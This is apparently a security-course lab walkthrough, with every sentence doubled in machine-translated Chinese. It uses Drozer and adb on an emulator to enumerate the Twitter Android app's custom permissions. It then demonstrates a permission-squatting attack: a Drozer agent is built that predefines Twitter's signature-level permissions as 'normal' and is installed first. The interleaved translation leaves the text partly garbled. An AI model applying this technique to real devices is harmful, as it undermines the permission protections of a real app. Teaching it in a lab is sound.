ip addr ip addr
Find your IP address, as highlighted in the image below.找到您的IP地址,如下图所示。 To find your Android device, execute this command, replacing the IP address with the IP address you found above, including the CIDR suffix "/24".要查找您的Android设备,请执行此命令,将IP地址替换为您在上面找到的IP地址,包括CIDR后缀“/ 24”。
netdiscover -r 172.16.123.155/24 netdiscover -r 172.16.123.155/24
Netdiscover finds the devices on your network. Netdiscover会在您的网络上找到这些设备。 Find the one that is not from "VMware", as highlighted in the image below.找到不属于“VMware”的那个,如下图所示。 Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined in the previous step.执行此命令以连接到您的Android设备,将IP地址替换为您在上一步中确定的设备的IP地址。
adb connect 172.16.123.171 adb connect 172.16.123.171
Adb connects, as shown below. Adb连接,如下所示。 If you don't have a Drozer agent on your emulator, execute these commands to install one:如果您的模拟器上没有Drozer代理,请执行以下命令安装一个:
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk adb install drozer-agent-2.3.4.apk adb install drozer-agent-2.3.4.apk
adb forward tcp:31415 tcp:31415 adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.该命令完成且没有错误,如下所示。 Information about the app appears, starting with general information as shown below.显示有关该应用程序的信息,从一般信息开始,如下所示。drozer console connect drozer控制台连接 run app.package.info -a com.twitter.android运行app.package.info -a com.twitter.android
At the end, there are three permissions the Twitter app defines, as shown below:最后,Twitter应用程序定义了三个权限,如下所示:
I was unable to find out what "READ_DATA" does in detail, but we can learn more about the other two permissions.我无法详细了解“READ_DATA”的内容,但我们可以了解有关其他两个权限的更多信息。
To see the appm components, execute this command:要查看appm组件,请执行以下命令:
run app.package.attacksurface com.twitter.android运行app.package.attacksurface com.twitter.android
Twitter uses several activities , " broadcast receivers ", and services , but no "content providers", as shown below. Twitter使用了几种活动 ,“ 广播接收者 ”和服务 ,但没有“内容提供者”,如下所示。 run app.activity.info -a com.twitter.android运行app.activity.info -a com.twitter.android
We see that the AUTH_APP permission controls access to the AuthorizeAppActivity activity, as shown below.我们看到AUTH_APP权限控制对AuthorizeAppActivity活动的访问,如下所示。 run app.broadcast.info -a com.twitter.android运行app.broadcast.info -a com.twitter.android
We see that the RESTRICTED permission controls access to the AppBroadcastReceiver receiver, as shown below.我们看到RESTRICTED权限控制对AppBroadcastReceiver接收器的访问,如下所示。 As shown below, READ_DATA and RESTRICTED have the signature protection level, and AUTH_APP is marked as dangerous .如下所示, READ_DATA和RESTRICTED具有签名保护级别, AUTH_APP被标记为危险 。run information.permissions --permission com.twitter.android.permission.READ_DATA运行information.permissions --permission com.twitter.android.permission.READ_DATA run information.permissions --permission com.twitter.android.permission.RESTRICTED运行information.permissions --permission com.twitter.android.permission.RESTRICTED run information.permissions --permission com.twitter.android.permission.AUTH_APP运行information.permissions --permission com.twitter.android.permission.AUTH_APP exit出口
The signature -level permissions are only available to apps signed with the same certificate, and the dangerous permission will pop a box up, requesting permission from the user. 签名级别权限仅适用于使用相同证书签名的应用程序, 危险权限将弹出一个框,请求用户许可。
Execute these commands to do that.执行这些命令来执行此操作。
If an "Outdated processor microcode" box appears, press Enter .如果出现“过时的处理器微码”框,请按Enter键 。apt update apt更新 apt install openjdk-8-jdk -y apt install openjdk-8-jdk -y
Execute this command to reboot Kali.执行此命令以重新启动Kali。
reboot重启
Execute this command to select the default version of javac, the Java compiler:执行此命令以选择javac的默认版本,即Java编译器: update-alternatives --config javac update-alternatives --config javac
Find "java-8" on the list and select it.在列表中找到“java-8”并选择它。 When I did it, that was item 2 as shown below.当我这样做时,那是第2项,如下所示。 Execute this command to select the default version of java:执行此命令以选择java的默认版本:
update-alternatives --config java update-alternatives --config java
Find "java-8" on the list and select it.在列表中找到“java-8”并选择它。 When I did it, that was item 2 as shown below.当我这样做时,那是第2项,如下所示。 The agent is built and placed in the /tmp directory.构建代理并将其放在/ tmp目录中。 Note the path to the agent, highlighted in the image below.请注意代理的路径,如下图所示。drozer agent build --permission \ drozer agent build --permission \ com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.AUTH_APP com.twitter.android.permission.AUTH_APP
adb connect 172.16.123.171 adb connect 172.16.123.171
Adb connects, as shown below. Adb连接,如下所示。 Leave this window running, as shown below.保持此窗口运行,如下所示。adb logcat -c adb logcat -c adb logcat | adb logcat | grep perm grep烫发
In the second command, adjusting the path to lead to the APK file you built previously with Drozer.在第二个命令中,调整路径以指向您之前使用Drozer构建的APK文件。
The agent installs, as shown in the upper window in the image below.代理程序将安装,如下图中的上部窗口所示。adb uninstall com.mwr.dz adb uninstall com.mwr.dz adb install /tmp/tmpzXbifs/agent.apk adb install /tmp/tmpzXbifs/agent.apk
The log shows that the app was not granted these two permissions:日志显示应用程序未被授予以下两个权限:
This makes sense, because those are signature -level permissions, and the Drozer agent is not signed with the Twitter certificate.这是有道理的,因为这些是签名级别权限,并且Drozer代理未使用Twitter证书签名。
The operations succeed, as shown below.操作成功,如下所示。adb uninstall com.mwr.dz adb uninstall com.mwr.dz adb uninstall com.twitter.android adb uninstall com.twitter.android
The agent is built and placed in the /tmp directory.构建代理并将其放在/ tmp目录中。 Note the path to the agent, highlighted in the image below.请注意代理的路径,如下图所示。drozer agent build --define-permission \ drozer agent build --define-permission \ com.twitter.android.permission.READ_DATA normal \ com.twitter.android.permission.READ_DATA正常\ com.twitter.android.permission.RESTRICTED normal \ com.twitter.android.permission.RESTRICTED正常\ com.twitter.android.permission.AUTH_APP normal --permission \ com.twitter.android.permission.AUTH_APP正常 - 允许\ com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.AUTH_APP com.twitter.android.permission.AUTH_APP
In the second command, adjusting the path to lead to the APK file you built previously with Drozer.在第二个命令中,调整路径以指向您之前使用Drozer构建的APK文件。
adb install /tmp/tmp_URMcR/agent.apk adb install /tmp/tmp_URMcR/agent.apk
The agent installs, as shown below.代理程序安装,如下所示。 If you are using Android 5.0 or above, the installation should fail with the error message shown below.如果您使用的是Android 5.0或更高版本,则安装失败,并显示如下所示的错误消息。
I used the one shown below.我使用下面显示的那个。
You can't use the Gapps button to install Google Play.您无法使用Gapps按钮安装Google Play。 Instead, you need to install these two components one by one, rebooting after each installation.相反,您需要逐个安装这两个组件,每次安装后重新启动。
https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip
https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip
Then repeat the project.然后重复该项目。 This time Twitter will install.这次Twitter将安装。
Launch the Drozer agent, configure port forwarding, and execute these commands to see Twitter's protection levels:启动Drozer代理,配置端口转发,并执行这些命令以查看Twitter的保护级别:
The permissions are all normal , as shown below.权限都正常 ,如下所示。drozer console connect drozer控制台连接 run information.permissions --permission com.twitter.android.permission.READ_DATA运行information.permissions --permission com.twitter.android.permission.READ_DATA run information.permissions --permission com.twitter.android.permission.RESTRICTED运行information.permissions --permission com.twitter.android.permission.RESTRICTED run information.permissions --permission com.twitter.android.permission.AUTH_APP运行information.permissions --permission com.twitter.android.permission.AUTH_APP exit出口